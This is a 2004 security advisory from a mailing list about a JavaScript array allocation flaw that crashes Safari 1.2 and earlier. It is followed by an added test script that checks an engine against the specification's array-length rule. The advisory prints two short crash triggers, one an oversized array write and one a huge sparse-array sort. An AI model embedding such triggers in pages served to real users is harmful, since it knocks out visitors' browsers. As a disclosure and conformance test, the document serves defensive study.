Message-ID: <404A4566.7050508@insecure.ws>
From: kang at insecure.ws (kang)
Subject: Safari javascript array overflow
http://www.insecure.ws/article.php?story=2004021918172533
A problem exists in the way Safari's JavaScript engine allocates Arrays.
For example, allocating an array that is too large and writing into it
will segfault Safari. There is no known way to execute remote code with
this vulnerability as of the date of this advisory.
Konqueror doesn't seem to be vulnerable.
- --
Adv: safari_0x03
Release Date: 06/04/04
Affected Products: Safari <= 1.2
Impact: Denial of Service, Possible exploitation
Severity: Remote, medium.
Vendor: Notified (19/03/04)
Author: kang, kang@...ecure.ws
Simple allocation management error trigger:
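    // requested length is far beyond the 32-bit array length range
    var a = new Array(99999999999999999999999);
    a[0+5]="AAAAA";
Another possibility...;)
    // large sparse array sorted with a comparator that always returns 1
    var bam = new Array(0x23000000);
    bam.sort(new Function("return 1"));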
There are some other possibilities :>
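
Added example, not part of the original advisory: ECMAScript requires `new Array(len)` to throw a RangeError unless ToUint32(len) equals len, so a conformant engine rejects the first length above and accepts the second as a sparse array. The probe below checks an engine for that behaviour using the advisory's lengths plus constructed boundary values; the function names are hypothetical and the `sort` construct is not run.

```javascript
// Added example: not code from the advisory. Function names are hypothetical.

// ECMAScript rule for `new Array(len)` with a numeric argument:
// the length is accepted only if ToUint32(len) === len.
function isValidArrayLength(len) {
  return typeof len === "number" && (len >>> 0) === len;
}

// Run the advisory's allocate-then-write construct against the current
// engine and report the outcome instead of letting an exception escape.
function probeAllocateAndWrite(len) {
  const expected = isValidArrayLength(len) ? "accepted" : "RangeError";
  let observed;
  try {
    const a = new Array(len);
    a[0 + 5] = "AAAAA"; // same write as in the advisory
    // The length must stay consistent with the request and the write.
    observed = a.length === Math.max(len, 6) && a[5] === "AAAAA"
      ? "accepted" : "inconsistent";
  } catch (e) {
    observed = e instanceof RangeError ? "RangeError" : "other:" + e.name;
  }
  return { len, expected, observed, conformant: expected === observed };
}

// Lengths from the advisory, plus constructed boundary values.
const CASES = [
  99999999999999999999999, // advisory, first construct: not a uint32
  0x23000000,              // advisory, second construct: valid uint32
  4294967295,              // 2^32 - 1, largest valid length (constructed)
  4294967296,              // 2^32, first invalid length (constructed)
  -1,                      // constructed
  1.5,                     // constructed
];

function runProbes() {
  return CASES.map(probeAllocateAndWrite);
}

for (const r of runProbes()) {
  console.log(r.len, r.expected, r.observed, r.conformant ? "ok" : "MISMATCH");
}
```

A "MISMATCH" line, or a crash before any line is printed, means the engine does not apply the length check the specification requires.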